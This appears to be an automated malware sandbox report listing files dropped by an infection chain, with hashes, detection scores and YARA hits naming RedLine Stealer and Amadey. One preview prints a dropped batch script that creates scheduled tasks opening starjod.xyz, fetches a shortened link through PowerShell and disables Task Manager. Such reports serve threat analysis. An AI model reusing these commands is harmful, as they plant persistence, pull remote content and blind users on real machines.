Size (bytes):	158208
Entropy (8bit):	6.79366712379007
Encrypted:	false
SSDEEP:	3072:EahKyd2n3155GWp1icKAArDZz4N9GhbkrNEk1tYT:EahOVp0yN90QE8E
MD5:	5F331887BEC34F51CCA7EA78815621F7
SHA1:	2EB81490DD3A74ACA55E45495FA162B31BCB79E7
SHA-256:	D7AB2F309EE99F6545C9E1D86166740047965DD8172AEC5F0038753C9FF5E9D8
SHA-512:	7A66C5D043139A3B20814AC65110F8151CF652E3F9D959489781FDAEA33E9F53CE9FD1992F1A32BFF73380C7D9EF47200D8B924A8ADF415E7A93421D62EB054D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..e...6...6...6..7...6..7...6..7...6..7...6...6...6..7...6..o6...6..7...6Rich...6................PE..d................."......\|.....................@....................................s.....`.......... ......................................<...........(....................... .......T...........................................(... ............................text....{.......\|.................. ..`.rdata...".......$..................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc.. ............h..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ama[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	304128
Entropy (8bit):	5.028503796569042
Encrypted:	false
SSDEEP:	3072:WqFFrqwIOGdTypEmz07sFPaF16CVyeR+LhdwT5TZMfvgZcZqf7D34NeqiOLCbBOy:tBIOG6hPPLd05TZaYcZqf7DI3L
MD5:	5D860E52BFA60FEC84B6A46661B45246
SHA1:	1259E9F868D0D80AC09AADB9387662347CD4BD68
SHA-256:	B4A1E470F814BBCF1BC26C087EB513F4BAB6165C90ECF43AC71DD87702561C30
SHA-512:	04EA5757D01508A44E0152B3AA78F530908DA649D59B8CE7EE3E15C2D4D0314C97F346C1E79B1810EDB27165D04781C022937D02536DC9B1DD4C55F023A47701
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ama[1].exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...xT................0.................. ........@.. ....................................@.................................h...O...................................L................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	9434
Entropy (8bit):	4.928515784730612
Encrypted:	false
SSDEEP:	192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
MD5:	D3594118838EF8580975DDA877E44DEB
SHA1:	0ACABEA9B50CA74E6EBAE326251253BAF2E53371
SHA-256:	456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
SHA-512:	103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
Malicious:	false
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\1000007001\ama.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	304128
Entropy (8bit):	5.028503796569042
Encrypted:	false
SSDEEP:	3072:WqFFrqwIOGdTypEmz07sFPaF16CVyeR+LhdwT5TZMfvgZcZqf7D34NeqiOLCbBOy:tBIOG6hPPLd05TZaYcZqf7DI3L
MD5:	5D860E52BFA60FEC84B6A46661B45246
SHA1:	1259E9F868D0D80AC09AADB9387662347CD4BD68
SHA-256:	B4A1E470F814BBCF1BC26C087EB513F4BAB6165C90ECF43AC71DD87702561C30
SHA-512:	04EA5757D01508A44E0152B3AA78F530908DA649D59B8CE7EE3E15C2D4D0314C97F346C1E79B1810EDB27165D04781C022937D02536DC9B1DD4C55F023A47701
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...xT................0.................. ........@.. ....................................@.................................h...O...................................L................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000014001\1.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	176063
Entropy (8bit):	7.138227393400436
Encrypted:	false
SSDEEP:	3072:ZswtCW600rB9asH0JW3TGSg/+ranKc2y3EyBTftiACq2A9m1eiX2B:ZDCW0B99Hb37c2eBDtzJ2Gql
MD5:	AB5C9F3C83AE4388607D1F60C82A7C28
SHA1:	2937F70E6C61F5D1B6D7FF9840B12F04EDC407FB
SHA-256:	9BEDD9ECE0A30934A8FD51C1A18A0A127EF2383E2B4604954FCCA2F522AA3A21
SHA-512:	F63A70D2E456B8A8B1FC077828FB13E4659114A5B15EDC71A4ACE258D2A3490DEEC91CF34D8DE83C4093DBF8590EF042400EE7E92860AB0277644C220A1DB2A7
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........uV............................................................................Rich............PE..L......c.................$..........0/.......@....@..................................^..........................................P........<..........................T...............................P...@............@...............................text...@".......$.................. ..`.rdata...L...@...N...(..............@..@.data...$2...........v..............@....rsrc....<.......>...,..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2665984
Entropy (8bit):	6.546705490640015
Encrypted:	false
SSDEEP:	49152:UjBP3/qGrdNJ8VZFhY++Yk/4aLq8wH7mm6qJsSRRjyl:aBPvfrAZF28k/RLbwH7mvcRRjy
MD5:	FFADA57F998ED6A72B6BA2F072D2690A
SHA1:	6857B5F0C40A1CDB0411EB34AA9FE5029BCDB84F
SHA-256:	677F393462E24FB6DBA1A47B39E674F485450F91DEEE6076CCBAD9FD5E05BD12
SHA-512:	1DE77F83A89935BB3FC3772D5190C3827D76A998785D451E2C0D11A0061CFD28F1B96ECCB41B012C76DDDA2021E3333A0A647489AE3C6DAC10CFB8302ABDF33F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 82%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....e.........."...........(.....@..........@.............................0)...........`.....................................................<.....).......(.............. ).x...............................(.......8...........@...X............................text...V........................... ..`.rdata...".......$..................@..@.data.....'.......'.................@....pdata........(.......(.............@..@.00cfg........(.......(.............@..@.tls..........(.......(.............@....rsrc.........).......(.............@..@.reloc..x.... ).......(.............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000035001\gold.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	535080
Entropy (8bit):	7.63039679990245
Encrypted:	false
SSDEEP:	12288:dJStzAr5BeoKKYOr0ukzbMpbV4CvhbDyUdt1c6SEw7ZBEO:dMz+coKkzk3MpbIMrcvHZBt
MD5:	70A578F7F58456E475FACD69469CF20A
SHA1:	83E147E7BA01FA074B2F046B65978F838F7B1E8E
SHA-256:	5C8D556E39269B22E63BA9C941FF306BB043BC35125BA08787617577231B381A
SHA-512:	707ED48B45978D26FAAF3544BF22912461503D6E4B1A077CBB7C3A8ABD2F1EB3FEC16B2786A79AE4DB2DFEC92F662ECE1998BC142706D2B482599FB6191563C0
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............T...T...T[..U...T[..U#..T[..U...TJi.U...T[..U...T...T...TJi.U...TJi.U...T{j.U...T{j2T...T{j.U...TRich...T........................PE..L.....df...............'.Z..................p....@..........................P............@.................................d...<.......................(&... ..("..x...................................@............p..t............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data........0......................@....rsrc...............................@..@.reloc..("... ...$..................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	317952
Entropy (8bit):	6.813361448161113
Encrypted:	false
SSDEEP:	6144:3lGhYe2gss2fHZq4uCDrgcKJCMBus902mdK/WI5O7KKKDi4G:3lGhYHh0CnYZSLP7KKKD1G
MD5:	6E3D83935C7A0810F75DFA9BADC3F199
SHA1:	9F7D7C0EA662BCDCA9B0CDA928DC339F06EF0730
SHA-256:	DC4F0A8E3D12C98EAC09A42BD976579CCC1851056D9DE447495E8BE7519760ED
SHA-512:	9F6B22BC9D0306A69D3C5BAB83C7603FA23925C12089F9608772602AB2C4C0908CDA2A3D9592FC0FAB4AAFF209EF41D3E2A931511CE9DFD027691E8DCE9AD9B9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....cf..........................................@.......................................@.....................................x............................0...Q...................................................................................text............................... ..`.rdata..7*.......,..................@..@.data....+..........................@....reloc...Q...0...R..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	424960
Entropy (8bit):	6.516408105291076
Encrypted:	false
SSDEEP:	12288:5fSPtGpmLb84Jjzo6yrBuKuJ+ITOC0Ud:UtGpmf8edykhV0Ud
MD5:	07101CAC5B9477BA636CD8CA7B9932CB
SHA1:	59EA7FD9AE6DED8C1B7240A4BF9399B4EB3849F1
SHA-256:	488385CD54D14790B03FA7C7DC997EBEA3F7B2A8499E5927EB437A3791102A77
SHA-512:	02240FF51A74966BC31CFCC901105096EB871F588EFAA9BE1A829B4EE6F245BD9DCA37BE7E2946BA6315FEEA75C3DCE5F490847250E62081445CD25B0F406887
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L...).nf..........................................@.......................................@.................................,....................................K......8...................l..........@............................................text............................... ..`.rdata..:...........................@..@.data....e... ...4..................@....rsrc...............................@..@.reloc...K.......L...0..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	158208
Entropy (8bit):	6.79366712379007
Encrypted:	false
SSDEEP:	3072:EahKyd2n3155GWp1icKAArDZz4N9GhbkrNEk1tYT:EahOVp0yN90QE8E
MD5:	5F331887BEC34F51CCA7EA78815621F7
SHA1:	2EB81490DD3A74ACA55E45495FA162B31BCB79E7
SHA-256:	D7AB2F309EE99F6545C9E1D86166740047965DD8172AEC5F0038753C9FF5E9D8
SHA-512:	7A66C5D043139A3B20814AC65110F8151CF652E3F9D959489781FDAEA33E9F53CE9FD1992F1A32BFF73380C7D9EF47200D8B924A8ADF415E7A93421D62EB054D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..e...6...6...6..7...6..7...6..7...6..7...6...6...6..7...6..o6...6..7...6Rich...6................PE..d................."......\|.....................@....................................s.....`.......... ......................................<...........(....................... .......T...........................................(... ............................text....{.......\|.................. ..`.rdata...".......$..................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc.. ............h..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000092001\legs.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	675368
Entropy (8bit):	7.728756552653038
Encrypted:	false
SSDEEP:	12288:rmdCEK6q454tcoonkKejC5Np01vwas4r/+IS71To3hg1aJEO:rDEQRtyb5Np0Rw/0+IS7G1t
MD5:	BBD06263062B2C536B5CAACDD5F81B76
SHA1:	C38352C1C08FB0FA5E67A079998EF30EBC962089
SHA-256:	1875275DA8D576FD9962C5B2BD9FE0E4B4D188CAAD9549125C8A64ECAF9308C9
SHA-512:	7FAA4E18CC9D7D82CB8EFE8494668E05F75DDD5A8C9C9A058B2246A786A60D7761168862220B70820B02F38F196CFB5F106DB36CDCFD5A5A3F9DFD01654EB9AD
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........\.j...j...j..R....j..R.../j..R....j..C...j..R....j...j...j..C...j..C...j..r...j..r.c..j..r...j..Rich.j..........PE..L....\pf...............'.~........................@..........................p............@.................................TE..(....0...............(..(&...@..x"......................................@...............h............................text....\|.......~.................. ..`.rdata..............................@..@.data...D....P.......@..............@....rsrc........0......................@..@.reloc..x"...@...$..................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000094001\taskweaker.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	6098432
Entropy (8bit):	6.56462814076081
Encrypted:	false
SSDEEP:	49152:IsLm1+6M1hSfHiiQsaaR6GRNxM2u8RpZAPN0E8hKfOFuyjh5EYR/xbsSrpMih44K:F8Gi57VpZqGFLEeZ8+F+5
MD5:	6C149B39619395A8BA117A4CAE95BA6F
SHA1:	3EF8BE98589745ECCE5522DD871E813F69A7B71B
SHA-256:	C43B64C78F6CCBA5CFB7DE13FC39D5CC43FAD9A9F5E78799B34100AB69E5E4E8
SHA-512:	866EDAE7858E7BFB82486E99B31550307DE81FA732A3075B6E2FF0ABCADE5331BE28BB14D894CDF5176DC907A45AAA1407B6D8C4295CC69B6D45516F319560A4
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 62%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$.. ...]................@.............................`c.....z.]...`... .......................................`.N.....`.......`......Y...............b...............................Y.(...................\|.`.@............................text..... ....... .................`.``.data...0.....!....... .............@.`..rdata....3...&...3...%.............@.`@.pdata........Y.......Y.............@.0@.xdata..D.....Z......zZ.............@.0@.bss..........Z.......................`..edata..N.....`.......Z.............@.0@.idata........`.......Z.............@.0..CRT....p.....`.......Z.............@.@..tls..........`.......Z.............@.@..rsrc........`.......Z.............@.0..reloc........b......F\.............@.0B................................................................................................................................

C:\Users\user\AppData\Local\Temp\1s.txt

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3
Entropy (8bit):	1.584962500721156
Encrypted:	false
SSDEEP:	3:cn:cn
MD5:	BC949EA893A9384070C31F083CCEFD26
SHA1:	CBB8391CB65C20E2C05A2F29211E55C49939C3DB
SHA-256:	6BDF66B5BF2A44E658BEA2EE86695AB150A06E600BF67CD5CCE245AD54962C61
SHA-512:	E4288E71070485637EC5825F510A7DAA7E75EF6C71A1B755F51E1B0F2E58E5066837F58408EA74D75DB42C49372C6027D433A869904FC5EFAF4876DFCFDE1287
Malicious:	false
Preview:	..

C:\Users\user\AppData\Local\Temp\6.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000007001\ama.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5037056
Entropy (8bit):	7.9825690955945365
Encrypted:	false
SSDEEP:	98304:/U1ygjPf+YEwNhQ9li49Zv85P95RPwAaj249R5EkDAUR:M0iPG4hQzi49ZgP/Rmj2gwkDA
MD5:	5BB3677A298D7977D73C2D47B805B9C3
SHA1:	91933EB9B40281E59DD7E73D8B7DAC77C5E42798
SHA-256:	85EB3F6BA52FE0FD232F8C3371D87F7D363F821953C344936AB87728BA6A627F
SHA-512:	D20F862E9FADB5AD12EDDAAE8C6EBBFA03D67D35C5CA272E185206EB256CD6A89C338CE608C992DF715D36A3F1624A507DBE324A057BD412B87438F4A008F33D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 29%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...V.rf..............................i...........@................................. .M...@..................................5:.......z.......................y.\.................................................... ..L............................text...n........................... ..`.rdata..k*..........................@..@.data...`...........................@....vmp-~.&..(.. ...................... ..`.vmp-~.&..... ......................@....vmp-~.&0.K..0....K................. ..`.reloc..\.....y.......K.............@..@.rsrc.........z.......K.............@..@........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\8.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000007001\ama.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	311296
Entropy (8bit):	6.76645685648397
Encrypted:	false
SSDEEP:	3072:CNumiCvg3BFzJ4CcdgRATfnk3UQwne2hBqiAwtmgeR+eH2UrWWxcvi6mRKRobWXY:uJCBFFo83UpbAIeRlH2lhCAxkAlQ2
MD5:	6863D8F623B5DA333280F965EA7F3399
SHA1:	1D556979AF572A2CD2B71B8B0DAFEC6A5C27D1D1
SHA-256:	1E4092031BB89F285A39F6FB9730FA172BC63ED82A51BFB39EA29E4FEC4B635D
SHA-512:	72F1EA32B099B16F5BD6D0B094D60A40FD80C50228BC2312A2AF107777CD8E0DA7057B731FEFFE3E1D233D9E072BC6C80F09414745B136F12AE5B738B8967E70
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....wf............................p.............@.......................................@.....................................x............................ ...R...................................................................................text...E........................... ..`.rdata...*.......,..................@..@.data...l...........................@....reloc...R... ...T...l..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Download File

Process:	C:\Users\user\Desktop\hsRju5CPK2.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1907712
Entropy (8bit):	7.9526022290614815
Encrypted:	false
SSDEEP:	49152:3HIA4pjmbxSZp+Gwan+DXkX8J0aQ/eptXrpPzTh3p0G:YAlxla+68JjQ/0rprTpp0
MD5:	E77913DFEB423031E19ACBD2460DFFEA
SHA1:	505930C0FB84B2CFF347020A4F06D4CB87A1CD07
SHA-256:	AC678B7F487381CBB608C2AE21747297E1090114E6907C7070F578E84BCEB824
SHA-512:	198944CBD723813F93EFBEF6AFAF265FA1B81013661B1D06B0F9FACFF70A4911305663FAC72BECBCA1297AE712D33986214C19F02ADBC3FE4A630D7C3420EFDA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 46%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L...*.^f..............................L...........@..........................@L...........@.................................X...l.............................K...............................K..................................................... . ............................@....rsrc...............................@....idata ............................@... .@+.........................@...vlmgqsmh......1.....................@...nzwzyaet......L.....................@....taggant.0....L.."..................@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\hsRju5CPK2.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\IXP000.TMP\ins.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe
File Type:	DOS batch file, ASCII text, with very long lines (303), with CRLF line terminators
Category:	dropped
Size (bytes):	1961
Entropy (8bit):	5.332300231733879
Encrypted:	false
SSDEEP:	48:3Q3ZQtOaHR2SRwjDocZoXLfpF2v2gx2+nbcJky24i:A3yDkpQ6nb8o
MD5:	0BE4CBFA51FE5F8010E78553A28F2779
SHA1:	AE21783C148AE1443FA87A43B9B51CB0AB1A799B
SHA-256:	CC56D197270CDF7C3B5C193EC5B3C63DD87B57B58F90571649F8F0E29A6F1A90
SHA-512:	337A332EECB12CB065A09B3AE01E86802082C576B203FFD1A8270C69172036DC244ECFFAD1FBA3DE76D573C77F1315821A563D2A4AED73BFEB9E9BDF6107EDFD
Malicious:	false
Preview:	@echo off..if exist %TEMP%\1s.txt exit....schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"%ProgramFiles%\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"..schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"%ProgramFiles%\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"....powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null"....set tempBatFile=%TEMP%\install.bat..echo schtasks /create /tn "Cleaner" /tr "C:\Users\%username%\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:00 >> %tempBatFile%..echo reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 00000001 >> %tempBatFile%..echo schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"%ProgramFiles%\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F >> %tempBatFile%..echo schtasks.exe /create /SC MINUTE /MO 11 /TN

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2yiyzsay.ljz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bfcutkke.2w0.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ctbd0q2x.yba.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ea20pg1b.qpg.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hf4nsvjq.hbq.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
